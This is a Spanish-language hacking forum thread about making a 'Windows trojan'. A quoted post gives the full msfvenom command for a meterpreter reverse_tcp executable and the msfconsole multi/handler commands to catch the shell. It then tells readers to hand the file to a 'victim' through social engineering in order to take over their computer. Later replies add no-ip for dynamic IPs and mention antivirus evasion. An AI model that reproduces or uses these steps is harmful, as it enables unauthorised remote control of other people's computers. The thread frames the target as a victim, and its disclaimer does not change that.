Troyano para Windows


BlxckSec

BlxckSec

Blue Team
Noder
Byr dijo:
¿Algún hilo para con una IP dinámica poder poner IP para este tipo de cosas?
Hacer clic para expandir...
Creo que llegó algo tarde, pero yo creo que lo más cómodo es hacerte un no-ip, para que puedas redirigir toda la información a tu gusto sin tocar el software
 
sntt

sntt

𒅒𒈔𒅒𒄆
Noderador
Nodero
Noder
Anomaly dijo:
Vamos a utilizar el comando msfvenom para hacer el exe(troyano)

1)Nos vamos a la terminal y ponemos:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=TuIP LPORT=ELQUEQUIERAS -e"El encoder que querais" -f exe R> La ruta que queráis y el nombre que queráis.
  1. -p = Payload que vas a cargar.(En la parte de x64, poneis el tipo de arquitectura de la víctima)
  2. LHOST = Tu ip (ifconfig)
  3. LPORT = Un Puerto
  4. -e = Un encoder cualquiera(msfvenom -l enconders)
  5. -f = Tipo de formato de salida (exe, apk, ps1,etc)
  6. R > = Ruta de donde quieres guarda el archivo.
2) Después de haber echo el archivo, abrimos una nueva terminal y ponemos: "msfconsole"
Una vez abierto ponemos:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST TuIP
set LPORT TuPuerto
Exploit(Ahora se quedara escuchando)

3) Ahora le pasamos el exe a la víctima(con Ingeniería social o lo que sea).
Una vez lo habrá la víctima tendrás un meterpreter en tu ordenador.(Poniendo help en la meterpreter te saldrá la diferentes cosas que puedes hacer, mas adelante lo explicaré junto a los módulos de post-explotación)
Ya tendrás su ordenador a tu disposición.
giphy.gif


No me hago responsable del mal uso que se haga con este post
Hacer clic para expandir...
Lo intentaré hacer, buen aporte
 
RoosT

RoosT

Miembro
qav dijo:
Busca lo que te dije en un tutorial de youtube xd
Hacer clic para expandir...
pero tienen que tener EL MISMO SISTEMA OPERATIVO Y HABILITAR LA OPCIÓN QUE DICE EL YOUTUBER EN ESTE VIDEO Y ESTAR CONECTADOS EN LA MISMA RED CON EL CMD EN MODO ADMINISTRADOR. De lo contrario NO FUNCIONA no?
 
  • Like
Reacciones : qav
qav

qav

No soy el mejor mod, pero soy un excepcional pato
Noderador
Nodero
Noder
RoosT dijo:
pero tienen que tener EL MISMO SISTEMA OPERATIVO Y HABILITAR LA OPCIÓN QUE DICE EL YOUTUBER EN ESTE VIDEO Y ESTAR CONECTADOS EN LA MISMA RED CON EL CMD EN MODO ADMINISTRADOR. De lo contrario NO FUNCIONA no?
Hacer clic para expandir...
No se si piensas que yo soy @destapeman o que, yo simplemente me encargo de moderar y responder mensajes, en algunos casos tambien ayudo usuarios nuevos, lo que sepa o no sepa no importa xd
 
  • Hahaha
Reacciones : destapeman
bit_

bit_

Miembro
y el bypass del av no lo tienes en cuenta? un ejecutable de msfvenom canta al toque y no vas a poder ejecutarlo a menos que desactives el av en la máquina objetivo
 
U

Usuario123

Miembro
BlxckSec dijo:
Un malware nunca va a ser pentesting
Hacer clic para expandir...

Se puede usar en pentesting, funciona exactamente igual que una shell en php y eso, tu puedes subirla y si tienes manera de ejecutarla pues tienes una shell easy, en hackthebox hay algunas maquinas en las que se usa y en reales tambien se puede
 
Hay que estar conectado o registrado para responder aquí.
Arriba Pie